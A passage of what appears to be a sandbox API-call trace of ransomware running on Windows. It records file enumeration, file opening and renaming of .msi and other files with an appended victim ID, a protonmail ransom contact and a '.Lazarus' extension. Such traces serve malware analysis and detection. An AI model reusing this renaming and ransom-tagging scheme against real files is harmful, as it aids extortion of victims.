lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0067.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0067.471] CloseHandle (hObject=0x428) returned 1 [0068.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x690d0 [0068.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0068.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0068.599] AreFileApisANSI () returned 1 [0068.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0068.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0068.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 41 [0068.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0068.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xce) returned 0x73938 [0068.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x73938, cchWideChar=103 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 103 [0068.599] MoveFileExW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73938 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.600] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x4f452052, dwReserved1=0x48fd93a0, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0068.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0068.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0068.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0068.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.601] AreFileApisANSI () returned 1 [0068.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", lpUsedDefaultChar=0x0) returned 45 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0068.602] AreFileApisANSI () returned 1 [0068.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0068.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 45 [0068.602] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.602] GetFileType (hFile=0x428) returned 0x1 [0068.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0068.603] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.603] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.603] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.603] CloseHandle (hObject=0x428) returned 1 [0068.603] AreFileApisANSI () returned 1 [0068.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0068.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 45 [0068.603] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.604] GetFileType (hFile=0x428) returned 0x1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0068.604] CloseHandle (hObject=0x428) returned 1 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.605] AreFileApisANSI () returned 1 [0068.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0068.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 45 [0068.605] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000)) returned 1 [0068.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0068.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0068.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.605] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.606] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.606] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.606] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.606] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0068.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.606] AreFileApisANSI () returned 1 [0068.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", lpUsedDefaultChar=0x0) returned 45 [0068.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0068.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0068.607] AreFileApisANSI () returned 1 [0068.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0068.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 45 [0068.607] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.607] GetFileType (hFile=0x428) returned 0x1 [0068.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0068.607] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.607] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.608] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.608] CloseHandle (hObject=0x428) returned 1 [0068.608] AreFileApisANSI () returned 1 [0068.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x716f0 [0068.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 45 [0068.608] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.608] GetFileType (hFile=0x428) returned 0x1 [0068.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0068.609] CloseHandle (hObject=0x428) returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.609] 